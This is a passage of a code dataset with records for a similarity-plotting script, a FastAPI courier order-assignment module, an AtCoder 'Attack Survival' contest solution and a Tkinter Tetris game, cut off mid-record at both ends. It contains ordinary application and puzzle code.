read_file(ref_docs,dir+\"/\"+file,index,stats)\n return stats\n\n\ndef create_graph(stats):\n params = {'legend.fontsize': 'x-large',\n 'figure.figsize': (10, 7),\n 'axes.labelsize': 'x-large',\n 'axes.titlesize': 'x-large',\n 'xtick.labelsize': 'x-large',\n 'ytick.labelsize': 'x-large',\n 'font.family': 'serif'}\n plt.rcParams.update(params)\n group_name_dict = 
{\"Bot\": \"Bot\", \"Active\": \"Students\", \"static\": \"Static\", \"top\": \"S-T\",\"Dummy\":\"Planted\"}\n colors_dict = {\"Bot\": \"b\", \"Active\": \"r\", \"static\": \"y\", \"top\": \"k\",\"Dummy\":\"mediumslateblue\"}\n dot_dict = {\"Bot\": \"-o\", \"Active\": \"--^\", \"static\": \":p\", \"top\": \"-.x\",\"Dummy\":\"-.+\"}\n\n\n plt.figure()\n\n x = [j + 2 for j in range(len(stats[\"Bot\"]))]\n for group in stats:\n y = [stats[group][i] for i in sorted(list(stats[group].keys()))]\n\n plt.plot(x, y, dot_dict[group], label=group_name_dict[group], color=colors_dict[group], linewidth=5,\n markersize=10, mew=1)\n plt.xticks(x, fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel(\"Cosine\", fontsize=25)\n plt.xlabel(\"Rounds\", fontsize=25)\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.11),\n ncol=5, fontsize=20, frameon=False)\n plt.savefig(\"similarity_to_winner.pdf\", format=\"pdf\")\n plt.clf()\n\nstats = gather_stats(\"similarity_data/\")\ncreate_graph(stats)","repo_name":"greggoren/auto_seo","sub_path":"CompetitionBot/analyze_similarity.py","file_name":"analyze_similarity.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72014385528","text":"import datetime\nfrom typing import List\n\nfrom fastapi import HTTPException\nfrom starlette import status\n\nfrom app.database.__models import Order, DistributedOrders, Courier\nfrom app.database.db_session import create_session\nfrom app.schemas.__couriers import GetCouriersModel\nfrom app.schemas.__orders import GetOrderModel\nfrom app.schemas.__assignment import AssignmentInfoModel\nfrom app.utils.time import split_time, HH_MM\nfrom app.view.couriers import get_all_couriers, get_courier_by_id\nfrom app.view.orders import get_all_orders, get_order_by_id\n\nCOURIER_ASSIGNMENT_INFO = {'FOOT': [2, 10, 25, 10], 'BIKE': [4, 20, 12, 8], 'AUTO': [7, 40, 8, 4]}\n\nCOURIER_ORDER_GROUP = {}\nORDERS_IN_PROCESS = {}\n\n\n# чем больше интервал, тем менее срочный заказ,\n# чем больше стоимость, тем менее срочный заказ\ndef metric(cost: int, wh: str, dh: str) -> float:\n courier_start_time = split_time(wh, to_intervals=True)[0]\n order_end_time = split_time(dh, to_intervals=True)[1]\n\n return cost * (order_end_time - courier_start_time) / datetime.timedelta(minutes=3600)\n\n\n# оптимизированный жадный алгоритм при помощи эвристики и двух указателей\nasync def greedy(couriers: GetCouriersModel, type_params: List[int], number_of_all_orders: int):\n orders_in_group, weight, first_time_order, rest_time_orders = type_params\n\n # подготавливаем параметры\n orders_in_group -= 1\n first_time_order = datetime.timedelta(minutes=first_time_order)\n rest_time_orders = datetime.timedelta(minutes=rest_time_orders)\n\n for courier in couriers.couriers:\n courier_groups = []\n for wh in courier.working_hours:\n courier_start_time, courier_end_time = split_time(wh, to_intervals=True)\n # за такое время работы курьера нельзя доставить ни один заказ\n if courier_end_time - courier_start_time < first_time_order:\n continue\n\n possible_orders = await get_all_orders(limit=number_of_all_orders,\n offset=0, time_interval=wh,\n regions=courier.regions, weight=weight)\n\n possible_orders_with_duplicates = []\n\n for order in possible_orders.orders:\n if ORDERS_IN_PROCESS.get(order.order_id) == 1:\n continue\n if order.completed_time is not None:\n continue\n for dh in order.delivery_hours:\n # курьер не успеет доставить заказ, даже если начнет работать сразу\n 
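# (English gloss of the comment above: the courier will not manage to deliver this order in time even if they start working immediately, i.e. the delivery window closes within first_time_order minutes of the shift start.)\n                    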
order_start_time, order_end_time = split_time(dh, to_intervals=True)\n if order_end_time - courier_start_time < first_time_order:\n continue\n\n order_data = {'order_id': order.order_id,\n 'weight': order.weight,\n 'region': order.region,\n 'delivery_hours': [dh],\n 'cost': order.cost,\n 'completed_time': None}\n possible_orders_with_duplicates.append(GetOrderModel.parse_obj(order_data))\n\n possible_orders_with_duplicates = sorted(possible_orders_with_duplicates,\n key=lambda data: metric(data.cost, wh, data.delivery_hours[0]))\n\n i, j = 0, len(possible_orders_with_duplicates) - 1\n\n cur_time = courier_start_time\n cur_weight = weight\n courier_group = []\n\n while i < j:\n # распределение первого заказа в группе\n\n # скипаем уже взятые заказы\n while i < j and ORDERS_IN_PROCESS.get(possible_orders_with_duplicates[i].order_id) == 1:\n i += 1\n\n first_order = possible_orders_with_duplicates[i]\n\n # проверка на то, что заказ уже находится в исполнении\n if ORDERS_IN_PROCESS.get(first_order.order_id) == 1:\n i += 1\n continue\n\n # проверка веса\n if cur_weight - first_order.weight < 0:\n i += 1\n continue\n\n # проверки подходимости по времени\n first_order_start_time, first_order_end_time = \\\n split_time(first_order.delivery_hours[0], to_intervals=True)\n\n if first_order_start_time <= cur_time + first_time_order <= first_order_end_time:\n if cur_time + first_time_order > courier_end_time:\n i += 1\n continue\n cur_time += first_time_order\n courier_group.append([cur_time, first_order])\n cur_weight -= first_order.weight\n i += 1\n ORDERS_IN_PROCESS[first_order.order_id] = 1\n elif first_order_start_time > cur_time + first_time_order:\n if first_order_start_time - first_time_order > courier_end_time:\n i += 1\n continue\n cur_time = first_order_start_time - first_time_order\n continue\n else:\n i += 1\n continue\n\n # счетчик последующих заказов\n count = 0\n # набираем группу с количеством - 1, потому что первый заказ уже взяли\n while i < j and count < orders_in_group:\n # скипаем все те заказы, которые уже взяты\n while i < j and ORDERS_IN_PROCESS.get(possible_orders_with_duplicates[j].order_id) == 1:\n j -= 1\n if j == i:\n break\n next_order = possible_orders_with_duplicates[j]\n\n # проверка на то, что заказ находится в исполнении\n if ORDERS_IN_PROCESS.get(next_order.order_id) == 1:\n j -= 1\n continue\n\n # весовая проверка\n if cur_weight - next_order.weight < 0:\n j -= 1\n if j == i:\n break\n continue\n\n next_order_start_time, next_order_end_time = split_time(next_order.delivery_hours[0],\n to_intervals=True)\n\n # временная проверка\n if next_order_start_time <= cur_time + rest_time_orders <= next_order_end_time:\n if cur_time + rest_time_orders > courier_end_time:\n j -= 1\n if j == i:\n break\n continue\n cur_time += rest_time_orders\n courier_group.append([cur_time, next_order])\n cur_weight -= next_order.weight\n j -= 1\n ORDERS_IN_PROCESS[next_order.order_id] = 1\n elif next_order_start_time > cur_time + rest_time_orders:\n if next_order_start_time - rest_time_orders > courier_end_time:\n j -= 1\n if j == i:\n break\n continue\n cur_time = next_order_start_time - rest_time_orders\n continue\n else:\n j -= 1\n if j == i:\n break\n continue\n count += 1\n courier_groups.append(courier_group)\n courier_group = []\n cur_weight = weight\n\n if j - i == 1:\n break\n i, j = 0, len(possible_orders_with_duplicates) - 1\n COURIER_ORDER_GROUP[courier.courier_id] = courier_groups\n\n\nasync def distribute_orders() -> AssignmentInfoModel:\n session = create_session()\n\n 
number_of_all_orders = session.query(Order).count()\n\n for courier_type in COURIER_ASSIGNMENT_INFO: # 3 times\n number_of_couriers_of_type = list(session.query(Courier).filter(Courier.courier_type == courier_type))\n if number_of_couriers_of_type:\n number_of_couriers_of_type = number_of_couriers_of_type[-1].id\n else:\n number_of_couriers_of_type = 1\n couriers = await get_all_couriers(limit=number_of_couriers_of_type,\n offset=0, courier_type=courier_type)\n await greedy(couriers, COURIER_ASSIGNMENT_INFO[courier_type], number_of_all_orders)\n\n assignment_info = {'date': datetime.date.today(), 'couriers': []}\n\n for courier in COURIER_ORDER_GROUP.keys():\n courier_info = {'courier_id': courier, 'orders': []}\n group_order_id = 1\n\n for order_group in COURIER_ORDER_GROUP[courier]:\n order_group_info = {'group_order_id': group_order_id, 'orders': []}\n next_order_cost = 1.0\n\n for order_data in order_group:\n predictable_time, order = order_data\n predictable_time = predictable_time.time()\n start_time, end_time = split_time(order.delivery_hours[0])\n\n new_order = DistributedOrders(order_id=order.order_id, courier_id=courier,\n group_order_id=group_order_id,\n date=datetime.date.today(),\n start_time=start_time,\n end_time=end_time, predictable_time=predictable_time,\n after_fact_time=None,\n earnings=order.cost * next_order_cost)\n session.add(new_order)\n\n next_order_cost = 0.8\n order_info = {'order_id': order.order_id, 'weight': order.weight, 'region': order.region,\n 'delivery_hours': order.delivery_hours, 'cost': order.cost, 'completed_time': None}\n\n order_group_info['orders'].append(order_info)\n group_order_id += 1\n\n courier_info['orders'].append(order_group_info)\n assignment_info['couriers'].append(courier_info)\n\n COURIER_ORDER_GROUP.clear()\n ORDERS_IN_PROCESS.clear()\n session.commit()\n\n return AssignmentInfoModel.parse_obj(assignment_info)\n\n\nasync def get_all_assignment_info(date: datetime.date = datetime.date.today(),\n courier_id: int = None) -> AssignmentInfoModel:\n session = create_session()\n\n if not date <= datetime.date.today():\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n if courier_id:\n try:\n await get_courier_by_id(courier_id)\n except HTTPException:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n\n assignment_data = session.query(DistributedOrders).filter(DistributedOrders.date == date)\n if courier_id:\n assignment_data = assignment_data.filter(DistributedOrders.courier_id == courier_id)\n assignment_data = list(assignment_data)\n\n assignment_info = {'date': date, 'couriers': []}\n\n couriers_info = {}\n if not courier_id:\n for courier in session.query(Courier).all():\n if couriers_info.get(courier.id) is None:\n couriers_info[courier.id] = {'orders': {}}\n else:\n couriers_info[courier_id] = {'orders': {}}\n\n for entry in assignment_data:\n if couriers_info[entry.courier_id]['orders'].get(entry.group_order_id) is None:\n couriers_info[entry.courier_id]['orders'][entry.group_order_id] = {'orders': {}}\n\n for entry in assignment_data:\n order_info = await get_order_by_id(entry.order_id)\n if couriers_info[entry.courier_id]['orders'][entry.group_order_id].get(entry.order_id) is None:\n couriers_info[entry.courier_id]['orders'][entry.group_order_id]['orders'][entry.order_id] = \\\n {'weight': order_info.weight,\n 'region': order_info.region,\n 'delivery_hours': [entry.start_time.strftime(HH_MM) + '-' + entry.end_time.strftime(HH_MM)],\n 'cost': order_info.cost,\n 'completed_time': 
order_info.completed_time}\n\n for courier in couriers_info.keys():\n assignment_info['couriers'].append({'courier_id': courier, 'orders': []})\n\n for courier in assignment_info['couriers']:\n cur_courier_id = courier['courier_id']\n for group_order_id in couriers_info[cur_courier_id]['orders'].keys():\n courier['orders'].append({'group_order_id': group_order_id, 'orders': []})\n\n for courier in assignment_info['couriers']:\n cur_courier_id = courier['courier_id']\n for orders in courier['orders']:\n cur_group_order_id = orders['group_order_id']\n for order in couriers_info[cur_courier_id]['orders'][cur_group_order_id]['orders'].keys():\n real_order = couriers_info[cur_courier_id]['orders'][cur_group_order_id]['orders'][order]\n orders['orders'].append(\n {'order_id': order, 'weight': real_order['weight'], 'region': real_order['region'],\n 'delivery_hours': real_order['delivery_hours'], 'cost': real_order['cost'],\n 'completed_time': real_order['completed_time']})\n\n return AssignmentInfoModel.parse_obj(assignment_info)\n","repo_name":"Rudadadadada/Yandex.Lavka","sub_path":"app/view/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":14284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30338381556","text":"# -*- coding: utf-8 -*-\n# C - Attack Survival\n# https://atcoder.jp/contests/abc141/tasks/abc141_c\n\nN, K, Q = map(int, input().split())\nans = ['No'] * N\ns_array = [K] * N\nc_array = [0] * N\n\nfor i in range(Q):\n A = int(input())\n c_array[A-1] += 1\n\nsum_array = sum(c_array)\n\nfor i in range(N):\n calc = s_array[i] + c_array[i] - sum_array\n if calc > 0:\n ans[i] = 'Yes'\n\nprint(*ans, sep='\\n')\n\n# 16:15 - 16:51(AC)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_C/ABC141C.py","file_name":"ABC141C.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37852514510","text":"from __future__ import absolute_import, division, print_function\r\nfrom tkinter import *\r\nimport numpy as np\r\nimport random\r\nfrom PIL import Image, ImageTk\r\nimport json\r\n\r\n\r\ndef newshape(holding):\r\n global shapes,dy,dx,shapetype,board,nextshape,nextshapes,shapeboard,held,holdshapes,gameplaying,degree,score,totalrowsfilled,level,delay,fx,fxx\r\n if not holding:\r\n held = False\r\n for x in range(4):\r\n canvas.delete(shapes[x])\r\n shapeboard[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0] + fx[0]] = canvas.create_image(\r\n (shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1] + fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = 0 - shapetype - 1\r\n # print(x)\r\n rowsfillednum = 0\r\n for x in range(boardheight):\r\n if rowfilled(x):\r\n rowsfillednum += 1\r\n totalrowsfilled += 1\r\n if totalrowsfilled % 10 == 0 and not totalrowsfilled == 0:\r\n level += 1\r\n updatelevel()\r\n delay = delay * 0.9\r\n print(\"Increasing difficulty\")\r\n for r in range(boardheight):\r\n for c in range(boardwidth):\r\n canvas.delete(shapeboard[r][c])\r\n shapeboard = np.delete(shapeboard,x,0)\r\n newrow2 = np.ndarray((1,boardwidth),dtype=PhotoImage)\r\n shapeboard = np.concatenate((newrow2,shapeboard),axis=0) # I 
looked on stackoverflow on how to delete rows from array\r\n #print(shapeboard)\r\n board = np.delete(board,x,0)\r\n newrow = np.zeros((1,boardwidth))\r\n board = np.concatenate((newrow, board), axis=0)\r\n # print(board)\r\n for r in range(boardheight):\r\n for c in range(boardwidth):\r\n if shapeboard[r][c] != None:\r\n shapeboard[r][c] = canvas.create_image(c * size,r * size,anchor=NW,image=shapesimg[int(-1-board[r][c])])\r\n if rowsfillednum == 1:\r\n score += 100\r\n elif rowsfillednum == 2:\r\n score += 300\r\n elif rowsfillednum == 3:\r\n score += 500\r\n elif rowsfillednum == 4:\r\n score += 800\r\n #print(score)\r\n shapetype = nextshape\r\n nextshape = random.randint(0, 6)\r\n dy = 0\r\n dx = 0\r\n degree = 0\r\n fx = np.array([0, 0])\r\n fxx = fx\r\n for x in range(boardwidth):\r\n if board[1][x] < 0:\r\n gameplaying = False\r\n return\r\n\r\n for s in nextshapes:\r\n canvas.delete(s)\r\n for s in holdshapes:\r\n canvas.delete(s)\r\n #if holding:\r\n #nextshape = random.randint(0,6)\r\n nextshapes = []\r\n holdshapes = []\r\n for x in range(4):\r\n if nextshape == 0 or nextshape == 3:\r\n nextshapes.append(canvas.create_image((shapepoints[degree][nextshape][x] % 4 + 10.5) * size,\r\n (shapepoints[degree][nextshape][x] // 4 + 10) * size, anchor=NW,\r\n image=shapesimg[nextshape]))\r\n else:\r\n nextshapes.append(\r\n canvas.create_image((shapepoints[degree][nextshape][x] % 4 + 11) * size,\r\n (shapepoints[degree][nextshape][x] // 4 + 10) * size,\r\n anchor=NW, image=shapesimg[nextshape]))\r\n for x in range(4):\r\n if holdshape == 0 or holdshape == 3:\r\n holdshapes.append(canvas.create_image((shapepoints[degree][holdshape][x] % 4 + 10.5) * size,\r\n (shapepoints[degree][holdshape][x] // 4 + 3) * size, anchor=NW,\r\n image=shapesimg[holdshape]))\r\n elif holdshape != None:\r\n holdshapes.append(\r\n canvas.create_image((shapepoints[degree][holdshape][x] % 4 + 11) * size,\r\n (shapepoints[degree][holdshape][x] // 4 + 3) * size,\r\n anchor=NW, image=shapesimg[holdshape]))\r\n\r\n shapes = []\r\n for x in range(4):\r\n shapes.append(\r\n canvas.create_image((shapepoints[degree][shapetype][x] % 4 + 3) * size, shapepoints[degree][shapetype][x] // 4 * size,\r\n anchor=NW, image=shapesimg[shapetype]))\r\n board[shapepoints[degree][shapetype][x] // 4][shapepoints[degree][shapetype][x] % 4 + 3] = shapetype + 1\r\n updatescore()\r\n\r\ndef rowfilled(row):\r\n for x in range(boardwidth):\r\n if board[row][x] == 0:\r\n return False\r\n return True\r\n\r\ndef updatelevel():\r\n global levelimage\r\n canvas.delete(levelimage)\r\n levelimage = canvas.create_text(500,650,font=\"Times 20 italic bold\", #I took this off of stackoverflow\r\n text=str(level))\r\n\r\ndef updatescore():\r\n global scoreimage\r\n canvas.delete(scoreimage)\r\n scoreimage = canvas.create_text(500,750,font=\"Times 20 italic bold\", #same thing as above\r\n text=str(score))\r\ndef move(event):\r\n global i,dy,dx,degree,fx,rotation\r\n # print(board)\r\n if not gameplaying:\r\n return\r\n if event.keysym == \"Up\":\r\n rotation = 1\r\n rotate()\r\n elif event.keysym == \"z\":\r\n rotation = -1\r\n rotate()\r\n elif event.keysym == \"Down\":\r\n downinput(pressed = True)\r\n elif event.keysym == \"Left\":\r\n leftinput()\r\n elif event.keysym == \"Right\":\r\n rightinput()\r\n\r\ndef downinput(pressed):\r\n global dy,score,fx\r\n score += 1\r\n updatescore()\r\n #fx = np.array([0, 0])\r\n if not gameplaying:\r\n return\r\n if not valid(1):\r\n #time.sleep(3)\r\n newshape(False)\r\n dy -= 1\r\n dy +=1\r\n for s in shapes:\r\n 
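# remove the piece's old canvas sprites before redrawing it one row lower\r\n        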
canvas.delete(s)\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy + fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size, (shapepoints[degree][shapetype][x] // 4 + dy+fxx[1] + fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n if not pressed:\r\n win.after(int(delay),downinput,False) #stackoverflow window bind repeat/loop\r\n # print(board)\r\n\r\ndef leftinput():\r\n global dx\r\n if not valid(2):\r\n return\r\n for s in shapes:\r\n canvas.delete(s)\r\n dx -= 1\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n\r\ndef rightinput():\r\n global dx\r\n if not valid(3):\r\n return\r\n for s in shapes:\r\n canvas.delete(s)\r\n dx += 1\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 + fxx[0] +fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 4 + dy + fxx[1] + fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n\r\ndef rotatevalid():#points,offset):\r\n if shapetype == 0:\r\n return\r\n for x in range(4):\r\n newx = (shapepoints[degree][shapetype][x] % 4 + dx + 3 + fx[0] + fxx[0]) * size #from here to the last comment was code I converted from the Tetris rotation video to python\r\n newy = (shapepoints[degree][shapetype][x] // 4 + dy + fx[1] + fxx[1]) * size #i looked on stackoverflow for numpy array code\r\n a = np.array([[newx], [newy]])\r\n p = np.array([[(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] % 4 + dx + 3 + fx[0] + fxx[0]) * size],\r\n [(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] // 4 + dy + fx[1] + fxx[1]) * size]])\r\n # print(p)\r\n a = a - p\r\n b = np.array([[0, -1 * rotation], [1 * rotation, 0]]) #matrix from video\r\n c = np.dot(b, a) + p # hereeeeeeeeeeeeeeeeeeeeeeeeeeee\r\n if shapetype == 3:\r\n if degree == 0:\r\n c[1][0] += 40\r\n elif degree == 1:\r\n c[0][0] -= 40\r\n elif degree == 2:\r\n c[0][0] -= 40\r\n elif degree == 3:\r\n c[1][0] -= 40\r\n if c[0][0] > 399 or c[0][0] < -1:\r\n return False\r\n if c[1][0] > 799:\r\n return False\r\n if board[int(c[1][0] / 40)][int(c[0][0] / 40)] < 0:\r\n return False\r\n return True\r\n\r\ndef offset(): #this is mostly from video\r\n global rotationdx,canrotate,fx,dx,fxx\r\n if shapetype == 0:\r\n return\r\n canrotate = False #not mine\r\n lastdx = degree #not mine\r\n rotationdx = (degree + 1 * rotation) % 4 #not mine\r\n # print(\"attempting offset\")\r\n #fx = np.array([0, 
0])\r\n # print(degree)\r\n # print(fx)\r\n fxx += fx\r\n if shapetype == 3: #this too\r\n offsetdata = offsetI #and this\r\n else:\r\n offsetdata = offsetnormal #and this\r\n for x in range(5): #this whole loop isnt mine\r\n bx = np.array([offsetdata[x][lastdx][0],offsetdata[x][lastdx][1]])\r\n #print(bx)\r\n cx = np.array([offsetdata[x][rotationdx][0],offsetdata[x][rotationdx][1]])\r\n fx = np.subtract(bx,cx)\r\n # print(fx)\r\n if rotatevalid():\r\n canrotate = True\r\n # print(\"nice\")\r\n break\r\n #print(board)\r\n return canrotate\r\n\r\ndef rotate():\r\n global degree,fx,dx\r\n if shapetype == 0:\r\n return\r\n if rotatevalid():\r\n poop = 0\r\n elif offset():\r\n poop = 0\r\n else:\r\n return\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n #for x in range(4):\r\n #board[shapepoints[degree][shapetype][x] // 4 + dy + fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 + fx[0]] = 0\r\n # print(board)\r\n #board[shapepoints[shapetype][x] % 4 + dx + 3][shapepoints[shapetype][x] // 4 + dy] = 10\r\n #print(board)\r\n for x in range(4):\r\n newx = (shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0] + fx[0]) * size #not my idea\r\n newy = (shapepoints[degree][shapetype][x] // 4 + dy + fxx[1] +fx[1]) * size #from video\r\n\r\n a = np.array([[newx], [newy]]) #from video\r\n p = np.array([[(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] % 4 + dx + 3 +fxx[0]+ fx[0]) * size],\r\n [(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] // 4 + dy +fxx[1] + fx[1]) * size]]) #from video\r\n # print(p)\r\n a = a - p #from video\r\n b = np.array([[0, -1 * rotation], [1 * rotation, 0]]) #from video\r\n c = np.dot(b, a) + p #from video\r\n if shapetype == 3:\r\n if degree == 0:\r\n c[1][0] += 40\r\n elif degree == 1:\r\n c[0][0] -= 40\r\n elif degree == 2:\r\n c[0][0] -= 40\r\n elif degree == 3:\r\n c[1][0] -= 40\r\n # print(c[1][0])\r\n board[int((c[1][0])/ 40)][int((c[0][0])/ 40)] = shapetype + 1\r\n # print(board)\r\n #if offset():\r\n canvas.delete(shapes[x])\r\n shapes[x] = canvas.create_image(c[0][0], c[1][0], anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n #fx = np.array([0, 0])\r\n degree = (degree + 1 * rotation) % 4\r\n\r\ndef valid(dir): #up,down,left,right\r\n px = 0\r\n py = 0\r\n if dir == 1:\r\n py = dy + 1\r\n px = dx\r\n elif dir == 2:\r\n px = dx - 1\r\n elif dir == 3:\r\n px = dx + 1\r\n\r\n a = 0\r\n for x in range(4):\r\n if shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1] > boardheight-1:\r\n return False\r\n if shapepoints[degree][shapetype][x] // 4 + py + fxx[1] + fx[1] > boardheight - 1:\r\n return False\r\n if shapepoints[degree][shapetype][x] % 4 + px + 2 + fx[0] + fxx[0]< -1 or shapepoints[degree][shapetype][x] % 4 + px + 1 + fxx[0] + fx[0] > 7:\r\n return False\r\n if (dir == 0 or dir == 1) and board[shapepoints[degree][shapetype][x] // 4 + py +fxx[1] +fx[1]][shapepoints[degree][shapetype][x] % 4 + 3 + dx +fxx[0]+ fx[0]] < 0:\r\n return False\r\n if (dir == 2 or dir == 3) and board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + 3 + px +fxx[0]+ fx[0]] < 0:\r\n return False\r\n return True\r\n\r\ndef hold(event):\r\n global holdshape,shapetype,held,nextshape\r\n if holdshape == None:\r\n holdshape = shapetype\r\n shapetype = nextshape\r\n nextshape = random.randint(0, 6)\r\n held = True\r\n for s in shapes:\r\n canvas.delete(s)\r\n newshape(True)\r\n elif not held:\r\n temp = 
holdshape\r\n holdshape = shapetype\r\n shapetype = temp\r\n held = True\r\n for s in shapes:\r\n canvas.delete(s)\r\n newshape(True)\r\n\r\ndef x(event):\r\n global board\r\n evaluate()\r\n\r\ndef placeblocks(event):\r\n if board[event.y//40][event.x//40] == 0:\r\n shapeboard[event.y//40][event.x//40] = canvas.create_image(event.x // 40* size,event.y//40* size, anchor=NW,image=shapesimg[0])\r\n board[event.y//40][event.x//40] = -10\r\n #print(board)\r\n elif board[event.y//40][event.x//40] == -10:\r\n canvas.delete(shapeboard[event.y//40][event.x//40])\r\n board[event.y // 40][event.x // 40] = 0\r\n #print(board)\r\n\r\nwwidth = 600\r\nwheight = 800\r\nwin = Tk()\r\nwin.title('Tetris')\r\nwin.resizable(0,0)\r\ncanvas = Canvas(win, width=wwidth, height = wheight,bg = \"gray\",borderwidth=0,highlightthickness=0)\r\nwin.bind('', move)\r\nwin.bind(\"c\", hold)\r\nwin.bind('', x)\r\ncanvas.bind('', placeblocks)\r\ncanvas.pack()\r\n\r\nboardwidth = 10\r\nboardheight = 20\r\nsize = wheight/boardheight\r\ngameplaying = True\r\ndx = 0\r\ndy = 0\r\ntoplayerblock = False\r\nshapetype = random.randint(0,6)\r\nnextshape = random.randint(0,6)\r\ndelay = 750\r\ndegree = 0\r\nholdshape = None\r\nheld = False\r\nrotationdx = 0\r\nrotation = 1\r\ncanrotate = False\r\nfx = np.array([0,0])\r\nfxx = fx\r\noffsetrotate = 0\r\nscore = 0\r\ntotalrowsfilled = 0\r\nlevel = 1\r\nlevelimage = canvas.create_text(500,650,font=\"Times 20 italic bold\", #tooken from the stackoverflow\r\n text=str(level))\r\nscoreimage = canvas.create_text(500,750,font=\"Times 20 italic bold\", #tooken\r\n text=str(score))\r\n\r\nboard = np.zeros((boardheight,boardwidth)) #numpy stuff I looked up\r\nshapeboard = np.ndarray((boardheight,boardwidth),dtype=PhotoImage) #more stuff\r\n\r\nfor y in range(boardheight):\r\n canvas.create_line(0,y*(wheight/boardheight), (wheight/boardheight) * (boardwidth),y*(wheight/boardheight))\r\nfor x in range(boardwidth):\r\n canvas.create_line((x+1) * (wheight/boardheight),0,(x+1)*(wheight/boardheight),wheight)\r\n\r\ntiles = Image.open(\"tiles.jpg\") #I looked up how to import images\r\ntiles = tiles.resize((280,40), Image.ANTIALIAS)\r\nshapesimg = [\r\n ImageTk.PhotoImage(tiles.crop((0,0,size,size))), #O [0]\r\n ImageTk.PhotoImage(tiles.crop((size,0,size * 2,size))), #S [1]\r\n ImageTk.PhotoImage(tiles.crop((size * 2,0,size * 3,size))), #T [2]\r\n ImageTk.PhotoImage(tiles.crop((size * 3,0,size * 4,size))), #I [3]\r\n ImageTk.PhotoImage(tiles.crop((size * 4, 0, size * 5, size))), #Z [4]\r\n ImageTk.PhotoImage(tiles.crop((size * 5,0,size * 6,size))), #L [5]\r\n ImageTk.PhotoImage(tiles.crop((size * 6,0,size * 7,size))), #J [6]\r\n ]\r\nshapepoints = [[[1,2,5,6], #O #coordinate system I took from C++ video\r\n [1,2,4,5], #S\r\n [1,4,5,6],#T\r\n [4,5,6,7],#I\r\n [0,1,5,6],#Z\r\n [2,4,5,6],#L\r\n [0,4,5,6]],#J\r\n [[1,2,5,6], #O\r\n [1,5,6,10],#S\r\n [1,5,6,9], #T\r\n [2,6,10,14], #I\r\n [2,5,6,9],#Z\r\n [1,5,9,10],#L\r\n [1,2,5,9]],#J\r\n [[1,2,5,6],#O\r\n [5,6,8,9],#S\r\n [4,5,6,9],#T\r\n [8,9,10,11],#I\r\n [4,5,9,10],#Z\r\n [4,5,6,8],#L\r\n [4,5,6,10]],#J\r\n [[1,2,5,6],\r\n [0,4,5,9],\r\n [1,4,5,9],\r\n [1,5,9,13],\r\n [1,4,5,8],\r\n [0,1,5,9],\r\n [1,5,8,9]]\r\n]\r\nshapes = []\r\nfor x in range(4):\r\n shapes.append(canvas.create_image((shapepoints[0][shapetype][x] % 4 + 3) * size,shapepoints[0][shapetype][x] // 4* size,anchor=NW,image= shapesimg[shapetype]))\r\n board[shapepoints[0][shapetype][x] // 4][shapepoints[0][shapetype][x] % 4 + 3] 